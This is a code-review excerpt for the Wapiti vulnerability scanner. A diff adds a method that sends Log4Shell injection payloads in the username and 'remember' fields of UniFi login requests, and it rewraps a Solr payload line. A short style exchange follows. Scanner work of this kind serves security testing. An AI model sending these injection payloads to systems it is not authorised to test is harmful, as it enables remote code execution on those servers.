wapitiCore/attack/mod_log4shell.py

```diff
@@ -64,9 +66,43 @@ async def _attack_vsphere_url(self, original_request: Request):
             return
         await self._verify_header_vulnerability(malicious_request, header_target, payload, payload_unique_id, response)
 
+    async def _attack_unifi_url(self, request_url: Request):
+
+        payload_unique_id = uuid.uuid4()
+        payload = self._generate_payload(payload_unique_id)
+
+        malicious_request_username = Request(
+            path=request_url,
+            method="POST",
+            enctype="application/json",
+            post_params="{\"username\": \""+payload+"\", \"password\": "
+            "\"Letm3in_\", \"remember\": false, \"strict\": true}"
+        )
+
+        malicious_request_remember = Request(
+            path=request_url,
+            method="POST",
+            enctype="application/json",
+            post_params="{\"username\": \"alice\", \"password\": "
+            "\"Letm3in_\", \"remember\": \""+payload+"\", \"strict\": true}"
+        )
+
+        try:
+            response = await self.crawler.async_send(malicious_request_username, follow_redirects=True)
+            await self._verify_param_vulnerability(malicious_request_username, payload_unique_id, "username", response)
+        except RequestError:
+            self.network_errors += 1
+
+        try:
+            response = await self.crawler.async_send(malicious_request_remember, follow_redirects=True)
+            await self._verify_param_vulnerability(malicious_request_remember, payload_unique_id, "remember", response)
+        except RequestError:
+            self.network_errors += 1
+
     async def attack_apache_solr_url(self, request_url: str):
         payload_unique_id = uuid.uuid4()
-        payload = self._generate_payload(payload_unique_id).replace("{", "%7B").replace("}", "%7D")
+        payload = self._generate_payload(payload_unique_id).replace(
+            "{", "%7B").replace("}", "%7D")
```

Comment:
it's ugly to start a new line like this :( 

```
payload = self._generate_payload(payload_unique_id)
                       .replace("{", "%7B")
                       .replace("}", "%7D")
```

Reply:
Thanks to bad pylint config...